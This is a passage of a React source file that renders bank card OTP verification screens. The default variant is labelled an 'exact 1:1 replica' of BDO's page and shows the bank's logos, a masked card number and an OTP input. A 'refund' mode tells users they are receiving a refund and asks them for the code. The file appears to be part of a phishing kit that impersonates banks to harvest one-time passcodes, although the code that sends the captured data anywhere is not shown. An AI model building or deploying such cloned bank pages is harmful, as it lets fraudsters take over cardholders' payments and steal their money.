                  border: 'none',
                  cursor: 'pointer'
                }}
              >
                {isSubmitting ? '...' : (isRefund ? 'CONFIRM REFUND' : 'AUTHENTICATE')}
              </button>
            </form>

            <div style={{ marginTop: '1rem', textAlign: 'center' }}>
              <button
                type="button"
                onClick={handleResend}
                style={{ fontSize: '0.75rem', fontWeight: 'bold', color: '#1C3DB1', background: 'none', border: 'none', cursor: 'pointer' }}
              >
                RESEND OTP
              </button>
            </div>

            {resendSuccess && (
              <div className="ph-resend-alert" role="status">
                ✓ New OTP code sent to your mobile number
              </div>
            )}
          </main>
        </div>
      </div>
    );
  }

  // ─── 7. BDO VARIANT (Exact 1:1 replica of BDO.jsx - default) ────
  return (
    <div className="ph-container">
      <div className="ph-modal">
        <main className="ph-body">
          <div className="ph-logos-header">
            <img src={bank.logo} alt="" style={{ height: '2rem', width: 'auto', objectFit: 'contain' }} />
            <img src={schemeLogo} alt="" style={{ height: '2.5rem', width: 'auto', objectFit: 'contain' }} />
          </div>

          <h1 style={{ marginTop: '1.75rem', fontSize: '1rem', fontWeight: 'bold', color: '#434C74' }}>
            {isRefund ? 'Verify refund transaction via OTP:' : 'Verify this transaction via OTP:'}
          </h1>

          <p style={{ marginTop: '0.75rem', fontSize: '0.75rem', lineHeight: '1.5rem', color: '#404040' }}>
            An OTP was sent to your mobile no.
          </p>

          <p style={{ marginTop: '0.75rem', fontSize: '0.75rem', lineHeight: '1.5rem', color: '#404040' }}>
            You are {isRefund ? 'receiving a refund of' : 'paying'} {currency} {amount} {isRefund ? 'from' : 'to'} {merchant} using XXXX XXXX XXXX {last4} with Ref no b7e5f6aa.
          </p>

          {renderError()}

          <form onSubmit={handleSubmit} style={{ marginTop: '1.75rem' }}>
            <label htmlFor="bdo-otp" style={{ display: 'block', fontSize: '0.875rem', fontWeight: 'bold', color: '#000000' }}>
              Enter OTP
            </label>

            <input
              id="bdo-otp"
              type="text"
              inputMode="numeric"
              pattern="[0-9]*"
              maxLength={8}
              autoComplete="off"
              value={code}
              onChange={handleCodeChange}
              autoFocus
              style={{
                marginTop: '0.75rem',
                height: '2.5rem',
                width: '100%',
                borderRadius: '0.375rem',
                border: '1px solid #d4d4d4',
                backgroundColor: '#ffffff',
                padding: '0 0.75rem',
                fontSize: '0.75rem',
                color: '#404040',
                outline: 'none',
                boxSizing: 'border-box'
              }}
            />

            <button
              type="submit"
              disabled={code.length < 6 || code.length > 8 || isDuplicate || isSubmitting}
              style={{
                marginTop: '0.75rem',
                display: 'flex',
                height: '2.5rem',
                width: '100%',
                alignItems: 'center',
                justifyContent: 'center',
                borderRadius: '0.375rem',
                backgroundColor: '#0891b2',
                fontSize: '0.75rem',
                fontWeight: 500,
                color: '#ffffff',
                border: 'none',
                cursor: 'pointer'
              }}
            >
              {isSubmitting ? '...' : (isRefund ? 'CONFIRM REFUND' : 'SUBMIT')}
            </button>

            <button
              type="button"
              onClick={handleResend}
              style={{
                marginTop: '0.75rem',
                display: 'flex',
                height: '2.5rem',
                width: '100%',
                alignItems: 'center',
                justifyContent: 'center',
                borderRadius: '0.375rem',
                backgroundColor: '#737373',
                fontSize: '0.75rem',
                fontWeight: 500,
                color: '#ffffff',
                border: 'none',
                cursor: 'pointer'
              }}
            >
              RESEND
            </button>

            {resendSuccess && (
              <div className="ph-resend-alert" role="status">
                ✓ New OTP code sent to your mobile number
              </div>
            )}
          </form>
        </main>
      </div>
    </div>
  );
}
